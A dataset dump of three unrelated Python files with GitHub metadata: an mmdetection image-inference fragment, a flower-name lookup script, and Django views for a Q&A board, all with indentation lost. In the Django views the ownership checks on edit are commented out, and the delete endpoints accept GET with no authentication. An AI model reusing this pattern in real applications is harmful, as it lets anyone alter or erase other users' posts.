img_folder = '/61_data_lxy/data/price_sheet/table_pse_data/180_table_images'
out_folder = '/61_data_lxy/data/price_sheet/output/mm_pse_output'
model = init_detector(config_file, checkpoint_file)
for i in os.listdir(img_folder):
print(i)
# if i != '991.jpg': continue
img_pth = os.path.join(img_folder, i)
org_img = cv2.imread(img_pth)
if org_img is None: continue
h, w = org_img.shape[:2]
result, scale_factor = inference_detector(model, img_pth)
preds, boxes_list = result
if len(boxes_list):
boxes_list = boxes_list / scale_factor
cv2.drawContours(org_img, boxes_list.astype(int), -1, (0, 255, 0), 2)
cv2.imwrite(os.path.join(out_folder, i), org_img)
if __name__ == '__main__':
predict() | liangxiaoyun/mmdetection-1.1.0-pse-sar | tools/inference.py | inference.py | py | 3,663 | python | en | code | 0 | github-code | 90 |
29415682293 | def create_flowerdict(filename):
flower_dict = {}
with open(filename) as f:
for line in f:
letter = line.split(": ")[0].lower()
flower = line.split(": ")[1].strip()
flower_dict[letter] = flower
return flower_dict
def main():
flower_d = create_flowerdict('flowers.txt')
full_name = input("Enter your First [space] Last name only: ")
first_name = full_name[0].lower()
first_letter = first_name[0]
print("Unique flower name with the first letter: {}".format(flower_d[first_letter]))
main() | lorenzowind/python-programming | Data Structures & Algorithms/Scripting programs/match_flower_name.py | match_flower_name.py | py | 566 | python | en | code | 1 | github-code | 90 |
13360159210 | import json
from django.http import HttpResponse, JsonResponse
from rest_framework.decorators import api_view, renderer_classes
from rest_framework.response import Response
from rest_framework.renderers import TemplateHTMLRenderer
from .models import Question, Answer
from django.shortcuts import render, get_object_or_404,redirect, resolve_url
from django.utils import timezone
from .forms import QuestionForm, AnswerForm
from django.core.paginator import Paginator
from django.contrib.auth.models import User
from django.contrib import messages
from django.contrib.auth.decorators import login_required
@api_view(['GET'])
@renderer_classes([TemplateHTMLRenderer])
def board_list(request):
page = request.GET.get('page','1') # 페이지
question_list = Question.objects.order_by('-create_date')
paginator = Paginator(question_list,10) # 페이지당 10개 씩 보여주기
page_obj = paginator.get_page(page)
context = {'question_list':page_obj}
return Response(context, template_name='board/question_list.html')
@api_view(['GET'])
@renderer_classes([TemplateHTMLRenderer])
def board_detail(request,question_id):
try:
question = Question.objects.get(id=question_id)
context={'question':question}
return Response(context,template_name='board/question_detail.html')
except Question.DoesNotExist:
return Response(template_name='404.html')
@api_view(['POST'])
@renderer_classes([TemplateHTMLRenderer])
def answer_create(request,question_id):
question = Question.objects.get(id=question_id)
if request.method =="POST":
form = AnswerForm(request.POST)
if form.is_valid():
answer = form.save(commit=False)
if request.user.is_authenticated:
answer.author = request.user # author속성에 로그인계정 저장
else:
nonregisteruser, create = User.objects.get_or_create(username='비회원')
answer.author=nonregisteruser
answer.create_date=timezone.now()
answer.question = question
answer.save()
return redirect('{}#answer_{}'.format(
resolve_url('board:board_detail', question_id=question.id), answer.id))
else:
return Response(template_name='404.html')
context={'question':question, 'form':form}
return Response(context,template_name='board/question_detail.html')
# try:
# question = Question.objects.get(id=question_id)
# answer = Answer(question=question, content=request.POST.get('content',''), create_date=timezone.now())
# answer.save()
# return redirect('board:board_detail',question_id=question.id)
# except Question.DoesNotExist:
# return Response(template_name='404.html')
@api_view(['GET','POST'])
@renderer_classes([TemplateHTMLRenderer])
def question_create(request):
if request.method == "POST":
form = QuestionForm(request.POST)
if form.is_valid():
question = form.save(commit=False)
if request.user.is_authenticated:
question.author = request.user # author 속성에 로그인계정 저장
else:
noregisteruser, created = User.objects.get_or_create(username='비회원')
question.author = noregisteruser
question.create_date=timezone.now()
question.save()
return redirect('board:board_list')
else:
form = QuestionForm()
context={'form':form}
return Response(context,template_name='board/question_form.html')
@api_view(['GET','POST'])
@renderer_classes([TemplateHTMLRenderer])
def question_modify(request,question_id):
question = get_object_or_404(Question,pk=question_id)
# if request.user != question.author:
# messages.error(request, '수정권한이 없습니다.')
# return redirect('board:board_detail', question_id=question.id)
if request.method == "POST":
form = QuestionForm(request.POST, instance=question)
if form.is_valid():
question = form.save(commit=False)
question.modify_date= timezone.now() #수정일시 저장
question.save()
return redirect('board:board_detail', question_id=question.id)
else:
form = QuestionForm(instance = question)
context = {'form':form}
return render(request, 'board/question_form.html',context)
@api_view(['GET','POST'])
@renderer_classes([TemplateHTMLRenderer])
def question_delete(request, question_id):
question = get_object_or_404(Question, pk=question_id)
question.delete()
return redirect('board:board_list')
@api_view(['GET','POST'])
@renderer_classes([TemplateHTMLRenderer])
def answer_modify(request,answer_id):
answer = get_object_or_404(Answer,pk=answer_id)
# if request.user != question.author:
# messages.error(request, '수정권한이 없습니다.')
# return redirect('board:board_detail', question_id=question.id)
if request.method == "POST":
form = AnswerForm(request.POST, instance=answer)
if form.is_valid():
answer = form.save(commit=False)
answer.modify_date= timezone.now() #수정일시 저장
answer.save()
return redirect('{}#answer_{}'.format(
resolve_url('board:board_detail', question_id=answer.question.id), answer.id))
else:
form = AnswerForm(instance = answer)
context = {'answer':answer,'form':form}
return render(request, 'board/answer_form.html',context)
@api_view(['GET','POST'])
@renderer_classes([TemplateHTMLRenderer])
def answer_delete(request, answer_id):
answer = get_object_or_404(Answer, pk=answer_id)
answer.delete()
return redirect('board:board_detail', question_id=answer.question.id)
@api_view(["GET",'POST'])
@login_required(login_url='common:login')
def question_vote(request, question_id):
question = get_object_or_404(Question, pk=question_id)
question.voter.add(request.user)
return redirect('board:board_detail', question_id=question.id)
@login_required(login_url='common:login')
def answer_vote(request, answer_id):
answer = get_object_or_404(Answer, pk=answer_id)
answer.voter.add(request.user)
return redirect('{}#answer_{}'.format(
resolve_url('board:board_detail', question_id=answer.question.id), answer.id)) | kanngji/moimssaim | board/views.py | views.py | py | 6,462 | python | en | code | 0 | github-code | 90 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.